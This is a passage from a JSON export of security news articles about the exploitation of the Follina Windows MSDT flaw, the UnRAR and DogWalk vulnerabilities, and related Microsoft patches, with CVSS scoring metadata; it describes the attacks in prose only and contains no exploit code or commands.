spear-phishing attacks exploiting the \"Follina\" flaw in the Windows operating system to deploy password-stealing malware.\n\nAttributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled \"Nuclear Terrorism A Very Real Threat.rtf\" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap.\n\nFollina ([CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>), CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, as part of its [Patch Tuesday updates](<https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html>), but not before it was subjected to widespread zero-day exploit activity by numerous threat actors.\n\nAccording to an independent report published by Malwarebytes, [CredoMap](<https://www.virustotal.com/gui/file/2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933/detection>) is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) [divulged](<https://thehackernews.com/2022/05/ukraine-war-themed-files-become-lure-of.html>) last month as having been deployed against users in Ukraine.\n\nThe malware's main purpose is to siphon data, including passwords and saved cookies, from several popular browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1wPqkssWrspfFOV5JuqLYAuDaLjNgv0a4oY8utz6q-r8kkw4cw-U5qVZ_722pltmgZkJurfEHQKzfPepXA4DbY8QO48_whxdsmYcUA_f9jEjd-cYusjkZBmv0ozmOrz7CoM8xsOCjZyhYHFAjAYS5s_55J1l_yYV7WaDuogX68QqWZhDqjL9e9Bt5/s728-e100/russian.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEikeYfsPFY9KOWRt-wVKU533O8GTExdxYCnObIBP0XUPKaMQxzFMHJjcimjK_PVdu4_vU7TcyG4zQwzEroQSc6F8tl_QlNVzIi3GT6HY9Ufv-qcHbOr40bklODPdP5PJxl6VSNABxjdm24e3cx6nkZE-6G_dmvdoCwngGhCBnBIc6gf-EiESSQaoAcZ/s728-e100/ms.jpg>)\n\n\"Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence,\" Malwarebytes [said](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>). \"The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state.\"\n\nIt's not just APT28. CERT-UA has further [warned](<https://cert.gov.ua/article/160530>) of [similar](<https://cert.gov.ua/article/339662>) [attacks](<https://cert.gov.ua/article/40559>) mounted by [Sandworm](<https://thehackernews.com/2022/04/us-offers-10-million-bounty-for.html>) and an actor dubbed UAC-0098 that leverage a Follina-based infection chain to deploy CrescentImp and Cobalt Strike Beacons on to targeted hosts in media and critical infrastructure entities.\n\nThe development comes as Ukraine continues to be a [target for cyberattacks](<https://thehackernews.com/2022/05/ukrainian-cert-warns-citizens-of-new.html>) amidst the country's ongoing war with Russia, with [Armageddon hackers](<https://thehackernews.com/2022/04/russian-hackers-tried-attacking.html>) also spotted [distributing](<https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine>) the [GammaLoad.PS1_v2 malware](<https://cert.gov.ua/article/40240>) in May 2022.\n\n**_Update:_** Amidst relentless hacking attempts tailored to drop malware in Ukrainian organizations, Microsoft revealed in a [special report](<https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/>) that state-backed Russian hackers have engaged in \"strategic espionage\" against 128 targets spanning governments, think tanks, businesses, and aid groups in 42 countries supporting Kyiv since the onset of the war.\n\n49% of the observed activity focused on government agencies, followed by IT (20%), critical infrastructure (19%), and NGOs (12%). Just 29% of these intrusions are said to have been successful, with a quarter of the incidents leading to the exfiltration of sensitive data.\n\n\"To date, the Russians haven't used destructive 'wormable' malware that can jump from one computer domain to another and thereby cross international borders to spread economic damage,\" the Redmond-based tech giant said.\n\n\"Instead, they are designing attacks to stay within Ukraine. While Russia has been careful to confine its destructive malware to specific network domains located within Ukraine itself, these attacks are more sophisticated and widespread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T12:51:00", "type": "thn", "title": "Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-07T14:46:15", "id": "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "href": "https://thehackernews.com/2022/06/russian-hackers-exploiting-microsoft.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T04:01:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEix9juoco8nnHAqOnfVgYy907l0FhK0OUIkwyT7Z8lLsHMq1_XaxXWWdbEaVmO0GzWBpock9gOJmj4rYgynCBO3GDRX1ysvbUKHDWfySfjwKhL99dFK9ATPWadGxRBeH2hvWjzW6Exp4vE_gGhbBR8jVOZx7jiJj4XAJ-8kYUuEC2mavEgSWGkq-aW-/s728-e100/linux-unrara.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nTracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nThis means that an adversary could exploit the flaw to drop arbitrary files on a target system that has the utility installed simply by decompressing the file. The vulnerability was [revealed](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>) by SonarSource researcher Simon Scannell in late June.\n\n\"RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation,\" the agency [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in an advisory.\n\nNot much is known about the nature of the attacks, but the disclosure is evidence of a growing trend wherein threat actors are quick to scan for vulnerable systems after flaws are publicly disclosed and take the opportunity to launch malware and ransomware campaigns.\n\nOn top of that, CISA has also added [CVE-2022-34713](<https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html>) to the catalog after Microsoft, as part of its Patch Tuesday updates on August 9, revealed that it has seen indications that the vulnerability has been exploited in the wild.\n\nSaid to be a variant of the vulnerability publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), the shortcoming in the Microsoft Windows Support Diagnostic Tool (MSDT) component could be leveraged by a rogue actor to execute arbitrary code on susceptible systems by tricking a victim into opening a decoy file.\n\nFederal agencies in the U.S. are mandated to apply the updates for both flaws by August 30 to reduce their exposure to cyberattacks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:59:00", "type": "thn", "title": "CISA Issues Warning on Active Exploitation of UnRAR Software for Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-34713"], "modified": "2022-08-11T03:56:12", "id": "THN:A48A11A9708B43B68518F6625F1C0CB8", "href": "https://thehackernews.com/2022/08/cisa-issues-warning-on-active.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-09-26T14:15:34", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEges_oQp6YhYMafMFx5Bgh8Fw8z_Kw493RaFfsAEw_JLzOOb54c2i2bgfnW0FkTDBs_MLV-X6J32JSn8EBWja2e8VH9MYvtZfC3m9Xs1Ck2EOk_lIL4zHqZmFa7fbJAAlzH_V51OPs9BCNXC5F1-I_8AXChplDz3fUP8Fz9uaAnTNKyLSMHA_EkxVus/s728-e100/code.jpg>)\n\nA China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO **as part of an espionage campaign aimed at Tibetan entities.\n\nTargets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.\n\nThe intrusions involved the exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>) and [CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) (aka \"Follina\"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.\n\n\"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies,\" Recorded Future [said](<https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets>) in a new technical analysis.\n\nTA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiA6KaN98j8MBSFqaYNe3Dod86yILo_svn3l1ASNt_XF8pjnD-xxQspWUwkZLgODzNBkYLJ_tz2JD7T6amhNIP2_z_Y4h02QRpPA5iEkXLXi2RUK43WPK_MrAE7E8xcSV3rroxTL4wnxq00AUp3OXhrP5XHzbk4BQaHYJYjzWVp0fGAuT-LeC7f5CI6/s728-e100/dll.jpg>)\n\nThe group's exploitation of the Follina flaw was previously [highlighted](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.\n\nAlso put to use in a spear-phishing attack identified in May 2022 was a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This was achieved by employing a [Royal Road RTF weaponizer tool](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), which is widely shared among Chinese threat actors.\n\nIn another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.\n\nLOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.\n\n\"The group continues to incorporate new capabilities while also relying on tried-and-tested [tactics, techniques, and procedures,\" the cybersecurity firm said.\n\n\"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of [wider](<https://www.technologyreview.com/2022/02/28/1046575/how-china-built-a-one-of-a-kind-cyber-espionage-behemoth-to-last/>) [trends](<https://www.crowdstrike.com/global-threat-report/>) with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T12:14:00", "type": "thn", "title": "Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-30190"], "modified": "2022-09-26T13:59:50", "id": "THN:44DD118DC206D25EB4ECAE95173FE16E", "href": "https://thehackernews.com/2022/09/chinese-espionage-hackers-target.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T03:57:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiyxVEc_Mvo8igz5TouzFDQRJwfgGzJwxrqvv0ZABRdr2mIJrsGnRQPRSQRt6jUw9qm4bSTS7L6l-P2aKdJ7iX_oPNsk1hr2g1qcp2UPJujSRzuyjcVh1sB9rWs8Sc7LAqOzYalmR897GG8SOKJ_PKFZr2juLG7sXa8ji8u0oUUwkiAIyLrod-A420Z/s728-e100/windows-update.jpg>)\n\nMicrosoft finally released fixes to address an actively exploited Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates.\n\nAlso addressed by the tech giant are [55 other flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jun>), three of which are rated Critical, 51 are rated Important, and one is rated Moderate in severity. Separately, [five more shortcomings](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) were resolved in the Microsoft Edge browser.\n\nTracked as [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (CVSS score: 7.8), the [zero-day bug](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) relates to a remote code execution vulnerability affecting the Windows Support Diagnostic Tool (MSDT) when it's invoked using the \"ms-msdt:\" URI protocol scheme from an application such as Word.\n\nThe vulnerability can be trivially exploited by means of a specially crafted Word document that downloads and loads a malicious HTML file through Word's remote template feature. The HTML file ultimately permits the attacker to load and execute PowerShell code within Windows.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application,\" Microsoft said in an advisory. \"The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\nA crucial aspect of Follina is that exploiting the flaw does not require the use of macros, thereby obviating the need for an adversary to trick victims into enabling macros to trigger the attack.\n\nSince details of the issue surfaced late last month, it has been [subjected](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) to [widespread](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>) [exploitation](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware>) by different threat actors to drop a variety of payloads such as AsyncRAT, QBot, and other information stealers. Evidence indicates that Follina has been abused in the wild since at least April 12, 2022.\n\nBesides CVE-2022-30190, the cumulative security update also resolves several remote code execution flaws in Windows Network File System ([CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>)), Windows Hyper-V ([CVE-2022-30163](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30163>)), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC Video Extensions, and Azure RTOS GUIX Studio.\n\nAnother security shortcoming of note is [CVE-2022-30147](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30147>) (CVSS score: 7.8), an elevation of privilege vulnerability affecting Windows Installer and which has been marked with an \"Exploitation More Likely\" assessment by Microsoft.\n\n\"Once an attacker has gained initial access, they can elevate that initial level of access up to that of an administrator, where they can disable security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, said in a statement. \"In the case of ransomware attack, this leverages access to more sensitive data before encrypting the files.\"\n\nThe latest round of patches is also notable for not featuring any updates to the Print Spooler component for the first time since January 2022. They also arrive as Microsoft said it's officially [retiring support](<https://docs.microsoft.com/en-us/lifecycle/products/internet-explorer-11>) for [Internet Explorer 11](<https://docs.microsoft.com/en-us/lifecycle/announcements/internet-explorer-11-end-of-support-windows-10>) starting June 15, 2022, on Windows 10 Semi-Annual Channels and Windows 10 IoT Semi-Annual Channels.\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-06-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/entry/the-apache-news-round-up260>)\n * [Atlassian Confluence Server and Data Center](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [GitLab](<https://thehackernews.com/2022/06/gitlab-issues-security-patch-for.html>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/06/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/June-2022>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/june-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T03:42:00", "type": "thn", "title": "Patch Tuesday: Microsoft Issues Fix for Actively Exploited 'Follina' Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30136", "CVE-2022-30147", "CVE-2022-30163", "CVE-2022-30190"], "modified": "2022-06-16T03:10:20", "id": "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "href": "https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-08-10T12:48:23", "description": "Microsoft is urging users to patch a zero-day vulnerability dubbed Dogwalk that is actively being exploited in the wild. The bug ([CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>)) is tied to a Microsoft Windows Support Diagnostic Tool and allows a remote attacker to execute code on a vulnerable system.\n\n\u201cThe volume of fixes released this month is markedly higher than what is normally expected in an August release. It\u2019s almost triple the size of last year\u2019s August release, and it\u2019s the second largest release this year,\u201d wrote Dustin Childs, Zero Day Initiative manager, in a [Tuesday blog post](<https://www.zerodayinitiative.com/blog/2022/8/9/the-august-2022-security-update-review>).\n\n## **Dogwalk Flaw Was Over Two-Years Old **\n\nThe actively exploited Dogwalk bug was first reported to Microsoft in January 2020 by researcher Imre Rad. However, it wasn\u2019t until a [separate researchers began tracking the exploitation](<https://twitter.com/j00sean/status/1531643635543990275>) of a flaw dubbed [Follina](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)) that the Dogwalk bug was rediscovered. That renewed interest in Dogwalk appears to have motivated Microsoft to add the patch to this month\u2019s round of fixes, according to a Tenable Patch [Tuesday roundup report](<https://www.tenable.com/blog/microsofts-august-2022-patch-tuesday-addresses-118-cves-cve-2022-34713>).\n\nMicrosoft states that CVE-2022-34713 is a \u201cvariant of\u201d Dogwalk, but different. Microsoft scored the vulnerability as Important and warns that the exploitation of the bug can only be preformed by an adversary with physical access to a vulnerable computer. However, researchers at Zero Day Initiative outline how a remote attack might occur.\n\n\u201cThere is an element of social engineering to this as a threat actor would need to convince a user to click a link or open a document,\u201d Childs wrote.\n\nMicrosoft describes a possible attack as having a low complexity value, meaning it can be exploited easily and requires no advance system privileges to execute.\n\n\u201cThis bug also allows code execution when MSDT is called using the URL protocol from a calling application, typically Microsoft Word,\u201d Childs wrote. \u201cIt\u2019s not clear if this vulnerability is the result of a failed patch or something new,\u201d he added.\n\n## **17 Critical Flaws **\n\nThe most serious of the vulnerabilities patched on Tuesday include a trio of elevation of privilege vulnerabilities opening instances of Microsoft Exchange Server to attack. Microsoft has released a [separate alert page](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>) for this flaw to help mitigate the flaws.\n\n\u201cAll three vulnerabilities require authentication and user interaction to exploit \u2014 an attacker would need to entice a target to visit a specially crafted Exchange server, likely through phishing,\u201d wrote Tenable regarding the Exchange Server bugs.\n\nBack in the Patch Tuesday spotlight is a critical flaw ([CVE-2022-35804](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35804>)) in Microsoft\u2019s Server Message Block (SMB) client and server running on Windows 11 systems using Microsoft SMB 3.1.1 (SMBv3), according to the company. Microsoft categorized the bug as \u201cExploitation More Likely\u201d and assigned an 8.8 severity rating to the flaw.\n\nThe flaw only affects Windows 11, which Zero Day Initiative said, \u201cimplies some new functionality introduced this vulnerability.\u201d Researchers there said the SMB flaw could potentially be wormable between affected Windows 11 systems only when SMB server is enabled.\n\n\u201cDisabling SMBv3 compression is a workaround for this bug, but applying the update is the best method to remediate the vulnerability,\u201d wrote Childs.\n\nRated between 8.5 to 9.8 in severity, Microsoft patched a remote code execution flaw ([CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>)) in its Windows Network File System. This is the fourth month in a row that Microsoft has deployed a critical NFS code execution patch. Interestingly, Microsoft describes the flaw as Important, while researchers warn the bug is Critical and should be a priority patch.\n\n\u201cTo exploit this, a remote, unauthenticated attacker would need to make a specially crafted call to an affected NFS server. This would provide the threat actor with code execution at elevated privileges. Microsoft lists this as Important severity, but if you\u2019re using NFS, I would treat it as Critical. Definitely test and deploy this fix quickly,\u201d advises Zero Day Initiative.\n\nIn related news, [Adobe patched 25 CVEs on Tuesday](<https://helpx.adobe.com/security.html>) tackling bugs in Adobe Acrobat and Reader, Commerce, Illustrator, FrameMaker and Adobe Premier Elements.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T12:48:05", "type": "threatpost", "title": "Microsoft Patches \u2018Dogwalk\u2019 Zero-Day and 17 Critical Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35804"], "modified": "2022-08-10T12:48:05", "id": "THREATPOST:24243FD4F7B9BDBDAC283E15D460128F", "href": "https://threatpost.com/microsoft-patches-dogwalk-zero-day-and-17-critical-flaws/180378/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T12:48:32", "description": "Researchers have added state-sponsored hackers to the list of adversaries attempting to exploit Microsoft\u2019s now-patched Follina vulnerability. According to researchers at Proofpoint, state-sponsored hackers have attempted to abuse the Follina vulnerability in Microsoft Office, aiming an email-based exploit at U.S. and E.U. government targets via phishing campaigns.\n\nProofpoint researchers spotted the attacks and believe the adversaries have ties to a government, which it did not identify. Attacks consist of campaigns targeting victims U.S. and E.U. government workers. Malicious emails contain fake recruitment pitches promising a 20 percent boost in salaries and entice recipients to download an accompanying attachment.\n\nIn a Twitter-based statement, Sherrod DeGrippo, vice president of threat research at Proofpoint, said about 10 Proofpoint customers had received over 1,000 such messages.\n\nThe malicious attachment targets the remote code execution bug [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)_, dubbed _Follina.\n\n[Discovered](<https://twitter.com/nao_sec/status/1530196847679401984>) last month, the flaw exploits the Microsoft Windows Support Diagnostic Tool. As Microsoft explained in a [blog post](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), the bug \u201cexists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nState-sponsored abuse of the flaw is just the latest in a string of Follina-related attacks.\n\nIf successfully exploited, attackers can use the Follina flaw to install programs, view, change or delete data, or create new accounts in the context allowed by the user\u2019s rights, the company said.\n\n\u201cA remote code execution vulnerability exists when 